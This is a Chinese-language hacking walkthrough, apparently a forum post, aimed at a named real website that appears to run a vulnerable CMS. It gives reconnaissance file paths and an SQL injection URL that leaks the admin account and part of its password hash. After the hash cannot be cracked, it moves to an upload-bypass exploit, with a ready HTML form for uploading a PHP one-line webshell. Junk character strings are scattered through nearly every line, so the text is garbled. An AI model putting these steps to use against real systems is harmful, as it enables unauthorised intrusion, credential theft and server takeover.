①注入漏洞。& \2 R+ Z" ^2 B. f, {
这站 http://www.political-security.com/
3 r, K! q5 q- Y3 i首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
5 J* t$ b( e) _9 j) r4 Fwww.political-security.com/data/mysql_error_trace.inc 爆后台
9 \, O; j% Q8 p$ i$ k3 V然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
" D( u0 _. c l' w) F$ `, f然后写上语句 4 L( ?' N0 N* p" I, e; m x# C
查看管理员帐号
; d7 ^0 U, ^+ f6 L$ Y \http://www.political-security.co ... &membergroup=@`
' N2 [9 e( I4 x+ A4 R, a h$ @* ?7 n. |9 x7 N" R1 F
admin
! H- M& ~* [% j) x! S* D% D( W& r; b! ?& M
查看管理员密码8 C' Q1 t l U' F! B/ l
http://www.political-security.co ... &membergroup=@`
6 }- a" G1 k3 V0 ]" D
; M$ i5 R9 S$ d) S1 l4 e/ W8d29b1ef9f8c5a5af429, N# y' I; x& s" w2 D) j
& | i+ z m1 Y4 x! l( I K
查看管理员密码( S0 f+ P8 z) P3 b9 M4 u8 ]/ [ ~
" ~5 J" G6 Y, p. A: ]) f9 x得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
u( \/ t+ x, s a0 U& z1 C; Z. }- ^7 U$ o( n* ]
8d2* ]4 p! {/ E' o, a! L- t. J
9b1ef9f8c5a5af423 G5 `3 U) ~3 G: G2 L4 `
9- x1 c$ r: _& r
& K4 ~* b( A) d' r' v
cmd5没解出来 只好测试第二个方法* D ]" p0 j: I; T, u
& b! T, s: U; k Y5 W
$ v# n2 q* K0 X0 @9 P. m6 A6 l' M$ M! \
②上传漏洞:
/ ^& D+ t/ H+ K5 G( X3 x( N
- S1 X9 F* G- ?3 O- `# ^只要登陆会员中心,然后访问页面链接% H/ O, c' J1 x0 [9 L$ |
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”1 \ v/ _+ c+ ^# y
) c5 ]8 N2 j+ R: a7 d. P
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
9 Q% _# S# x$ ], \9 S5 Z2 q& t( k' W8 l3 W) M i* A; Y* p
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm( z: ~' b5 Y8 M- B5 ~/ o% ?
9 B, l0 u* T7 D- B- r! ?( N<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
) P0 E9 i2 g2 {0 |8 Z+ a或者6 J! c% {5 ^8 N/ L
即可上传成功 |